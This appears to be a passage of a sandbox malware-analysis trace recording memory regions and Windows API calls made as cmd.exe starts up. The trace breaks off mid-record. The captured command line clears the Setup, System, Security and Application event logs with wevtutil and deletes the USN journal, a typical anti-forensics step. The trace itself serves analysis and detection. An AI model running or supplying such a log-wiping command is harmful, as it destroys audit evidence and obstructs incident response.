= "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 593 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 594 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 595 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 596 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 597 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 598 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 599 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 600 start_va = 0x520000 end_va = 0x6a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 601 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 602 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 603 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 604 start_va = 0xe0000 end_va = 0xfffff entry_point = 0xe0000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 605 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 606 start_va = 0x710000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 607 start_va = 0x8a0000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 608 start_va = 0x1ca0000 end_va = 0x1f6efff entry_point = 0x1ca0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 23 os_tid = 0x9d4 [0051.189] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3cf780 | out: lpSystemTimeAsFileTime=0x3cf780*(dwLowDateTime=0xe0b5cd10, dwHighDateTime=0x1d2f1b1)) [0051.189] GetCurrentProcessId () returned 0x9d0 [0051.189] GetCurrentThreadId () returned 0x9d4 [0051.190] GetTickCount () returned 0x13561 [0051.190] QueryPerformanceCounter (in: lpPerformanceCount=0x3cf778 | out: lpPerformanceCount=0x3cf778*=183397462) returned 1 [0051.197] GetModuleHandleA (lpModuleName=0x0) returned 0x4a080000 [0051.198] __set_app_type (_Type=0x1) [0051.199] __p__fmode () returned 0x769e31f4 [0051.199] __p__commode () returned 0x769e31fc [0051.199] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0a21a6) returned 0x0 [0051.199] __getmainargs (in: _Argc=0x4a0a4238, _Argv=0x4a0a4240, _Env=0x4a0a423c, _DoWildCard=0, _StartInfo=0x4a0a4140 | out: _Argc=0x4a0a4238, _Argv=0x4a0a4240, _Env=0x4a0a423c) returned 0 [0051.200] GetCurrentThreadId () returned 0x9d4 [0051.200] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d4) returned 0x64 [0051.200] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74e70000 [0051.201] GetProcAddress (hModule=0x74e70000, lpProcName="SetThreadUILanguage") returned 0x74e9a84f [0051.201] SetThreadUILanguage (LangId=0x0) returned 0x409 [0051.202] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0051.203] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3cf710 | out: phkResult=0x3cf710*=0x0) returned 0x2 [0051.204] VirtualQuery (in: lpAddress=0x3cf747, lpBuffer=0x3cf6e0, dwLength=0x1c | out: lpBuffer=0x3cf6e0*(BaseAddress=0x3cf000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.204] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x3cf6e0, dwLength=0x1c | out: lpBuffer=0x3cf6e0*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0051.204] VirtualQuery (in: lpAddress=0x2d1000, lpBuffer=0x3cf6e0, dwLength=0x1c | out: lpBuffer=0x3cf6e0*(BaseAddress=0x2d1000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0051.204] VirtualQuery (in: lpAddress=0x2d3000, lpBuffer=0x3cf6e0, dwLength=0x1c | out: lpBuffer=0x3cf6e0*(BaseAddress=0x2d3000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.204] VirtualQuery (in: lpAddress=0x3d0000, lpBuffer=0x3cf6e0, dwLength=0x1c | out: lpBuffer=0x3cf6e0*(BaseAddress=0x3d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0051.204] GetConsoleOutputCP () returned 0x1b5 [0051.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0a4260 | out: lpCPInfo=0x4a0a4260) returned 1 [0051.205] SetConsoleCtrlHandler (HandlerRoutine=0x4a09e72a, Add=1) returned 1 [0051.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.205] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0051.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0a41ac | out: lpMode=0x4a0a41ac) returned 1 [0051.208] _get_osfhandle (_FileHandle=1) returned 0x7 [0051.208] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0051.209] _get_osfhandle (_FileHandle=0) returned 0x3 [0051.210] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0a41b0 | out: lpMode=0x4a0a41b0) returned 1 [0051.211] _get_osfhandle (_FileHandle=0) returned 0x3 [0051.211] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0051.211] GetEnvironmentStringsW () returned 0x432020 [0051.212] FreeEnvironmentStringsW (penv=0x432020) returned 1 [0051.212] GetEnvironmentStringsW () returned 0x432020 [0051.213] FreeEnvironmentStringsW (penv=0x432020) returned 1 [0051.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ce680 | out: phkResult=0x3ce680*=0x6c) returned 0x0 [0051.214] RegQueryValueExW (in: hKey=0x6c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x0, lpData=0x3ce68c*=0x0, lpcbData=0x3ce684*=0x1000) returned 0x2 [0051.214] RegQueryValueExW (in: hKey=0x6c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x1, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.215] RegQueryValueExW (in: hKey=0x6c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x0, lpData=0x3ce68c*=0x1, lpcbData=0x3ce684*=0x1000) returned 0x2 [0051.215] RegQueryValueExW (in: hKey=0x6c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x0, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.215] RegQueryValueExW (in: hKey=0x6c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x40, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.216] RegQueryValueExW (in: hKey=0x6c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x40, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.216] RegQueryValueExW (in: hKey=0x6c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x0, lpData=0x3ce68c*=0x40, lpcbData=0x3ce684*=0x1000) returned 0x2 [0051.216] RegCloseKey (hKey=0x6c) returned 0x0 [0051.216] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ce680 | out: phkResult=0x3ce680*=0x6c) returned 0x0 [0051.217] RegQueryValueExW (in: hKey=0x6c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x0, lpData=0x3ce68c*=0x40, lpcbData=0x3ce684*=0x1000) returned 0x2 [0051.217] RegQueryValueExW (in: hKey=0x6c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x1, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.217] RegQueryValueExW (in: hKey=0x6c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x0, lpData=0x3ce68c*=0x1, lpcbData=0x3ce684*=0x1000) returned 0x2 [0051.217] RegQueryValueExW (in: hKey=0x6c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x0, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.218] RegQueryValueExW (in: hKey=0x6c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x9, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.218] RegQueryValueExW (in: hKey=0x6c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x4, lpData=0x3ce68c*=0x9, lpcbData=0x3ce684*=0x4) returned 0x0 [0051.219] RegQueryValueExW (in: hKey=0x6c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ce688, lpData=0x3ce68c, lpcbData=0x3ce684*=0x1000 | out: lpType=0x3ce688*=0x0, lpData=0x3ce68c*=0x9, lpcbData=0x3ce684*=0x1000) returned 0x2 [0051.219] RegCloseKey (hKey=0x6c) returned 0x0 [0051.219] time (in: timer=0x0 | out: timer=0x0) returned 0x595667fe [0051.219] srand (_Seed=0x595667fe) [0051.220] GetCommandLineW () returned="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:" [0051.220] GetCommandLineW () returned="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:" [0051.220] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.221] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x432028, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0051.222] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.222] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.222] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0051.222] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0051.222] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0051.223] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0051.223] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0051.223] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0051.223] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0051.224] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0051.224] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0051.224] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0051.224] GetEnvironmentStringsW () returned 0x432238 [0051.224] FreeEnvironmentStringsW (penv=0x432238) returned 1 [0051.224] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.224] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0051.224] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0051.225] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0051.225] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0051.225] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0051.225] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0051.225] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0051.225] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0051.225] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0051.225] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3cf44c | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3cf44c, lpFilePart=0x3cf448 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3cf448*="system32") returned 0x13 [0051.226] GetFileAttributesW (lpFileName="C:\\Windows\\system32") returned 0x10 [0051.226] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3cf1c8 | out: lpFindFileData=0x3cf1c8) returned 0x435598 [0051.226] FindClose (in: hFindFile=0x435598 | out: hFindFile=0x435598) returned 1 [0051.227] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3cf1c8 | out: lpFindFileData=0x3cf1c8) returned 0x435598 [0051.227] FindClose (in: hFindFile=0x435598 | out: hFindFile=0x435598) returned 1 [0051.227] GetFileAttributesW (lpFileName="C:\\Windows\\System32") returned 0x10 [0051.228] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0051.228] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0051.228] GetEnvironmentStringsW () returned 0x434018 [0051.228] FreeEnvironmentStringsW (penv=0x434018) returned 1 [0051.228] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.229] GetConsoleOutputCP () returned 0x1b5 [0051.231] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0a4260 | out: lpCPInfo=0x4a0a4260) returned 1 [0051.231] GetUserDefaultLCID () returned 0x409 [0051.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0a4950, cchData=8 | out: lpLCData=":") returned 2 [0051.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3cf58c, cchData=128 | out: lpLCData="0") returned 2 [0051.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3cf58c, cchData=128 | out: lpLCData="0") returned 2 [0051.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3cf58c, cchData=128 | out: lpLCData="1") returned 2 [0051.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0a4940, cchData=8 | out: lpLCData="/") returned 2 [0051.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0a4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0a4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0a4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0a4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0a4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0a4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0a4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0a4930, cchData=8 | out: lpLCData=".") returned 2 [0051.234] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0a4920, cchData=8 | out: lpLCData=",") returned 2 [0051.235] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0051.236] GetConsoleTitleW (in: lpConsoleTitle=0x432e30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.238] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74e70000 [0051.238] GetProcAddress (hModule=0x74e70000, lpProcName="CopyFileExW") returned 0x74ea3b92 [0051.238] GetProcAddress (hModule=0x74e70000, lpProcName="IsDebuggerPresent") returned 0x74e84a5d [0051.238] GetProcAddress (hModule=0x74e70000, lpProcName="SetConsoleInputExeNameW") returned 0x74e9a79d [0051.240] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0051.240] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0051.240] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0051.240] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0051.240] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0051.240] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0051.240] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0051.243] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0051.243] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0051.243] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0051.243] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0051.243] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0051.243] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0051.243] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0051.246] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0051.246] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0051.247] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0051.248] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0051.248] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0051.248] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0051.248] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0051.250] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0051.250] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0051.250] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0051.250] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0051.250] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0051.250] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0051.250] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0051.251] _wcsicmp (_String1="fsutil", _String2=")") returned 61 [0051.251] _wcsicmp (_String1="FOR", _String2="fsutil") returned -4 [0051.251] _wcsicmp (_String1="FOR/?", _String2="fsutil") returned -4 [0051.251] _wcsicmp (_String1="IF", _String2="fsutil") returned 3 [0051.252] _wcsicmp (_String1="IF/?", _String2="fsutil") returned 3 [0051.252] _wcsicmp (_String1="REM", _String2="fsutil") returned 12 [0051.252] _wcsicmp (_String1="REM/?", _String2="fsutil") returned 12 [0051.253] GetConsoleTitleW (in: lpConsoleTitle=0x3cf220, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.254] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0051.254] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0051.254] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0051.254] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0051.254] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0051.254] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0051.254] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0051.254] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0051.254] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0051.254] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0051.254] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0051.254] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0051.254] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0051.254] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0051.254] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0051.254] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0051.254] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0051.254] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0051.254] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0051.254] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0051.254] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0051.254] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0051.255] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0051.255] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0051.255] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0051.255] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0051.255] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0051.255] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0051.255] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0051.255] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0051.255] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0051.255] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0051.255] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0051.255] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0051.255] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0051.255] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0051.255] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0051.255] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0051.255] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0051.255] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0051.255] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0051.255] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0051.255] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0051.255] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0051.255] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0051.255] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0051.255] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0051.255] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0051.255] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0051.256] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0051.256] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0051.256] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0051.256] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0051.256] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0051.256] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0051.256] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0051.256] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0051.256] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0051.256] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0051.256] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0051.256] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0051.256] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0051.256] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0051.256] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0051.256] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0051.256] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0051.256] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0051.256] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0051.256] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0051.256] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0051.256] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0051.256] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0051.256] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0051.256] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0051.256] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0051.256] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0051.257] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0051.257] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0051.257] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0051.257] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0051.257] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0051.257] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0051.257] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0051.257] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0051.257] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0051.257] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0051.257] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0051.257] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0051.258] 